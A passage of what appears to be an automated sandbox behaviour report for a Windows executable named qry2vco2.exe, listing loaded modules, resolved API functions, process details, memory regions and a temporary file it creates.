| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:11:59 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #113: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #113 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:22, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf78 |
| Parent PID | 0xeb8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
79C
0x
864
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00340000 | 0x003fdfff | Memory Mapped File | r |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00580000 | 0x005a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x007a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x00930fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x01d3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01f3ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x740d0000 | 0x74161fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
